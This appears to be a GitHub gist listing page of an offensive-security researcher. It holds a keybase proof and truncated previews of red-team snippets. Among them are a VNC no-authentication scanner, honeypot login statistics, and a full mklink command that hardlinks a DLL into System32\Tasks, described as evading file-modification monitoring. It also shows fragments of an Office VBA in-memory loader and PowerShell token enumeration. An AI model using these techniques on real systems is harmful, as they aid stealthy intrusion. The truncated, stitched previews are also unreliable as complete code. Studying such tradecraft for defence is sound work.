I hereby claim:
- I am justinbui on github.
- I am slyd0g (https://keybase.io/slyd0g) on keybase.
- I have a public key ASDPhm4B_dfyBrjqy73CebYKPc9Uyt-gp83GEtzmmkx3Ywo
To claim this, I am signing this object:
#!/usr/bin/env python | |
import socket | |
import os | |
TCP_PORT = 5900 | |
CURRENT_INDEX = 0 | |
############################################################################################################# | |
# Connect to designated IP over port 5900. Negotiate RFB version handshake + capture authentication methods # | |
# Returns '1' if no authentication is needed, else returns '0' # |
from sys import exit | |
import binascii | |
import getpass | |
import pickle | |
def str_to_ascii(text): | |
"""Function: Convert string to ascii | |
Input: String | |
Output: List of chars in string in ascii | |
""" |
678 China | |
107 India | |
106 Brazil | |
82 Russia | |
77 Mexico | |
65 United States | |
46 Turkey | |
36 Spain | |
35 Italy | |
30 Taiwan |
17844 admin | |
9706 root | |
2250 guest | |
977 support | |
695 default | |
402 user | |
378 daemon | |
314 adm | |
198 telnet | |
114 alpine |
I hereby claim:
To claim this, I am signing this object:
mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll
This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.
xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html
using System; | |
using System.EnterpriseServices; | |
using System.Runtime.InteropServices; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
using System.Collections; | |
using System.Collections.Generic; |
#!/bin/bash | |
input="$1" | |
rm output_trumail.txt | |
touch output_trumail.txt | |
while IFS= read -r line | |
do | |
curl https://api.trumail.io/v2/lookups/json?email=$line>>output_trumail.txt | |
echo>>output_trumail.txt | |
done < "$input" | |
cat output_trumail.txt | grep -v Rate | grep -v Max | grep -v response>output_trumail_final.txt |
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
#If Win64 Then | |
Const LS As LongPtr = 8& | |
#Else | |
Const LS As LongPtr = 4& |
function Get-Token | |
{ | |
foreach($proc in (Get-Process)) | |
{ | |
if($proc.Id -ne 0 -and $proc.Id -ne 4) | |
{ | |
try | |
{ | |
$hProcess = OpenProcess -ProcessId $proc.Id -DesiredAccess PROCESS_QUERY_LIMITED_INFORMATION | |
} |